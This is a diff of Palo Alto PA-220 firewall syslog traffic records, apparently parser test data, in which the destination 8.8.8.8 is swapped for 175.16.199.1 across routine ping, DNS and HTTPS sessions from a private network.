-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
